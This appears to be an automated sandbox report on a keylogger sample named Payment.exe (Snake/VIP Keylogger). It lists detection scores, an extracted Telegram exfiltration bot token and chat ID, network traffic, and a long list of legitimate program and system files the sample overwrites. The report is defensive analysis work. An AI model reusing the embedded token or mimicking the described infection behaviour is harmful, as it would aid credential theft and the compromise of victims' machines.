                  Source: 00000008.00000002.2150772680.0000000003CF1000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: VIP Keylogger {"Exfil Mode": "Telegram", "Bot Token": "7222288618:AAHmjWFpZ08g76_6xr4NgmiN7PynC_nQC7Y", "Chat id": "7941708421"}
                  Source: 00000008.00000002.2150772680.0000000003CF1000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Token": "7222288618:AAHmjWFpZ08g76_6xr4NgmiN7PynC_nQC7Y", "Chat_id": "7941708421", "Version": "4.4"}
                  Source: Payment.exeVirustotal: Detection: 41%Perma Link
                  Source: Payment.exeReversingLabs: Detection: 47%
                  Source: Submited SampleNeural Call Log Analysis: 99.3%
                  Source: 8.2.Payment.exe.3c40000.3.raw.unpackString decryptor: 7222288618:AAHmjWFpZ08g76_6xr4NgmiN7PynC_nQC7Y
                  Source: 8.2.Payment.exe.3c40000.3.raw.unpackString decryptor: 7941708421
                  Source: 8.2.Payment.exe.3c40000.3.raw.unpackString decryptor:

                  Location Tracking

                  barindex
                  Source: unknownDNS query: name: reallyfreegeoip.org
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_02E48286 CryptStringToBinaryA,CryptStringToBinaryA,GetTokenInformation,GetTokenInformation,GetLastError,OpenProcessToken,CloseHandle,GetSidSubAuthorityCount,8_2_02E48286
                  Source: Payment.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.8:49685 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.8:49724 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49722 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49753 version: TLS 1.2
                  Source: Payment.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdb source: elevation_service.exe, 00000011.00000003.1805106051.0000000000730000.00000004.00001000.00020000.00000000.sdmp, elevation_service.exe, 00000011.00000003.1805057918.00000000007C0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\ktab_objs\ktab.pdb source: elevation_service.exe, 00000011.00000003.1848948951.0000000000730000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: vssvc.pdb source: WBEngine.0.etl.34.dr
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\jjs_objs\jjs.pdb source: elevation_service.exe, 00000011.00000003.1846801591.0000000000730000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: mavinject32.pdbGCTL source: elevation_service.exe, 00000011.00000003.1809550980.0000000001460000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: PresentationFontCache.pdb source: elevation_service.exe, 00000011.00000003.1763004881.0000000000830000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\pack200_objs\pack200.pdb source: elevation_service.exe, 00000011.00000003.1849948590.0000000000730000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: _.pdb source: Payment.exe, 00000008.00000002.2149738780.0000000003C40000.00000004.08000000.00040000.00000000.sdmp, Payment.exe, 00000008.00000002.2146723496.0000000003898000.00000004.00000020.00020000.00000000.sdmp, Payment.exe, 00000008.00000002.2124505788.0000000001212000.00000004.00000020.00020000.00000000.sdmp, jwBqGZseW.exe, 00000027.00000002.2134571739.000000000368F000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\rmiregistry_objs\rmiregistry.pdb source: elevation_service.exe, 00000011.00000003.1851754548.0000000000730000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\a\_work\e\src\out\Release_x64\notification_helper.exe.pdb source: notification_click_helper.exe.8.dr
                  Source: Binary string: D:\a\_work\e\src\out\Release_x64\ie_to_edge_stub.exe.pdbOGP source: ie_to_edge_stub.exe.8.dr
                  Source: Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdb source: elevation_service.exe, 00000011.00000003.1808047986.00000000008C0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\tnameserv_objs\tnameserv.pdb source: elevation_service.exe, 00000011.00000003.1853173657.0000000000730000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb source: elevation_service.exe, 00000011.00000003.1795189498.0000000000730000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\servertool_objs\servertool.pdb source: elevation_service.exe, 00000011.00000003.1852312433.0000000000730000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: vcVJ.pdb source: Payment.exe
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\deploy\tmp\javacplexec\obj\javacpl.pdb source: javacpl.exe.8.dr
                  Source: Binary string: locator.pdb source: Locator.exe.8.dr
                  Source: Binary string: D:\T\BuildResults\bin\Release_x64\AdobeCollabSync.pdb# source: AdobeCollabSync.exe.8.dr
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\rmid_objs\rmid.pdb source: elevation_service.exe, 00000011.00000003.1851271062.0000000000730000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\java-rmi_objs\java-rmi.pdb source: elevation_service.exe, 00000011.00000003.1844334067.0000000000730000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: wbengine.pdb source: WBEngine.0.etl.34.dr
                  Source: Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdbU source: elevation_service.exe, 00000011.00000003.1805106051.0000000000730000.00000004.00001000.00020000.00000000.sdmp, elevation_service.exe, 00000011.00000003.1805057918.00000000007C0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\deploy\tmp\javacplexec\obj\javacpl.pdb774 source: javacpl.exe.8.dr
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\java_objs\java.pdb source: java.exe.8.dr
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\keytool_objs\keytool.pdb source: elevation_service.exe, 00000011.00000003.1847561680.0000000000730000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\a\_work\e\src\out\Release_x64\ie_to_edge_stub.exe.pdb source: ie_to_edge_stub.exe.8.dr
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\jjs_objs\jjs.pdb source: elevation_service.exe, 00000011.00000003.1846801591.0000000000730000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: mavinject32.pdb source: elevation_service.exe, 00000011.00000003.1809550980.0000000001460000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\policytool_objs\policytool.pdb source: elevation_service.exe, 00000011.00000003.1850530432.0000000000730000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdbY source: elevation_service.exe, 00000011.00000003.1808047986.00000000008C0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\rmid_objs\rmid.pdb source: elevation_service.exe, 00000011.00000003.1851271062.0000000000730000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\policytool_objs\policytool.pdb source: elevation_service.exe, 00000011.00000003.1850530432.0000000000730000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\servertool_objs\servertool.pdb source: elevation_service.exe, 00000011.00000003.1852312433.0000000000730000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\keytool_objs\keytool.pdb source: elevation_service.exe, 00000011.00000003.1847561680.0000000000730000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: ifsutil.pdb source: WBEngine.0.etl.34.dr
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\klist_objs\klist.pdb source: elevation_service.exe, 00000011.00000003.1848431203.0000000000730000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\tnameserv_objs\tnameserv.pdb source: elevation_service.exe, 00000011.00000003.1853173657.0000000000730000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\ktab_objs\ktab.pdb source: elevation_service.exe, 00000011.00000003.1848948951.0000000000730000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: notification_helper.exe.pdb source: notification_helper.exe.8.dr
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\java-rmi_objs\java-rmi.pdb source: elevation_service.exe, 00000011.00000003.1844334067.0000000000730000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb$$ source: elevation_service.exe, 00000011.00000003.1795189498.0000000000730000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: udfs.pdb source: WBEngine.0.etl.34.dr
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\kinit_objs\kinit.pdb source: elevation_service.exe, 00000011.00000003.1847956635.0000000000730000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\a\_work\e\src\out\Release_x64\notification_helper.exe.pdbOGP source: notification_click_helper.exe.8.dr
                  Source: Binary string: uudf.pdb source: WBEngine.0.etl.34.dr
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\orbd_objs\orbd.pdb source: elevation_service.exe, 00000011.00000003.1849458502.0000000000730000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\pack200_objs\pack200.pdb source: elevation_service.exe, 00000011.00000003.1849948590.0000000000730000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\rmiregistry_objs\rmiregistry.pdb source: elevation_service.exe, 00000011.00000003.1851754548.0000000000730000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: vcVJ.pdbSHA256& source: Payment.exe
                  Source: Binary string: PresentationFontCache.pdbHt^t Pt_CorExeMainmscoree.dll source: elevation_service.exe, 00000011.00000003.1763004881.0000000000830000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: locator.pdbGCTL source: Locator.exe.8.dr
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\klist_objs\klist.pdb source: elevation_service.exe, 00000011.00000003.1848431203.0000000000730000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\kinit_objs\kinit.pdb source: elevation_service.exe, 00000011.00000003.1847956635.0000000000730000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\orbd_objs\orbd.pdb source: elevation_service.exe, 00000011.00000003.1849458502.0000000000730000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: default-browser-agent.pdb source: default-browser-agent.exe.8.dr
                  Source: Binary string: D:\T\BuildResults\bin\Release_x64\AdobeCollabSync.pdb source: AdobeCollabSync.exe.8.dr
                  Source: Binary string: vssapi.pdb source: WBEngine.0.etl.34.dr
                  Source: Binary string: spp.pdb source: WBEngine.0.etl.34.dr

                  Spreading

                  barindex
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Windows\System32\wbem\WmiApSrv.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\Installer\setup.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Windows\System32\vds.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Windows\System32\alg.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Program Files\7-Zip\7zFM.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Windows\System32\snmptrap.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Windows\System32\Spectrum.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Program Files\Windows Media Player\wmpnetwk.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Windows\System32\Locator.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Program Files (x86)\Google\GoogleUpdater\135.0.7023.0\updater.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Program Files\7-Zip\7z.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Windows\System32\AppVClient.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Windows\SysWOW64\perfhost.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Program Files\7-Zip\7zG.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Windows\System32\msiexec.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\elevation_service.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Windows\System32\VSSVC.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Windows\System32\wbengine.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\os_update_handler.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Windows\System32\SearchIndexer.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\Installer\chrmstp.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\notification_helper.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Windows\System32\TieringEngineService.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Check.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\chrome_pwa_launcher.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Windows\System32\AgentService.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Program Files\7-Zip\Uninstall.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\elevated_tracing_service.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Windows\System32\FXSSVC.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Windows\System32\SgrmBroker.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Windows\System32\OpenSSH\ssh-agent.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSystem file written: C:\Windows\System32\sppsvc.exe
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Windows\System32\SensorDataService.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Windows\System32\msdtc.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_02E4DF57 FindFirstFileW,8_2_02E4DF57
                  Source: C:\Users\user\Desktop\Payment.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\java.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaw.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaws.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\java.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaw.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaws.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 4x nop then lea esp, dword ptr [ebp-08h]0_2_052E8F29
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 4x nop then jmp 0748D4DFh0_2_0748CF29
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 4x nop then jmp 0748D4DFh0_2_0748CF69
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 4x nop then jmp 03ADFB20h8_2_03ADFB6F
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 4x nop then jmp 03ADFB20h8_2_03ADF980
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 4x nop then jmp 070A8320h8_2_070A7FE0
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 4x nop then jmp 070A9AEBh8_2_070A9818
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 4x nop then jmp 070A25ACh8_2_070A2300
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 4x nop then jmp 070AB1E3h8_2_070AAF10
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 4x nop then jmp 070AD20Bh8_2_070ACF38
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 4x nop then jmp 070A55DCh8_2_070A5330
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 4x nop then jmp 070A79DCh8_2_070A7730
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 4x nop then jmp 070A2A04h8_2_070A2758
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 4x nop then jmp 070AF233h8_2_070AEF60
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 4x nop then jmp 070A5A34h8_2_070A5788
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 4x nop then jmp 070A7E34h8_2_070A7B88
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 4x nop then jmp 070AB67Bh8_2_070AB3A8
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 4x nop then jmp 070A2E5Ch8_2_070A2BB0
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 4x nop then jmp 070AD6A3h8_2_070AD3D0
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 4x nop then jmp 070A5E8Ch8_2_070A5BE0
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 4x nop then jmp 070AF6CBh8_2_070AF3F8
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 4x nop then jmp 070AC8DBh8_2_070AC608
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 4x nop then jmp 070AE903h8_2_070AE630
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 4x nop then jmp 070A1CFCh8_2_070A1A50
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 4x nop then jmp 070AAD4Bh8_2_070AAA78
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 4x nop then jmp 070A4D2Ch8_2_070A4A80
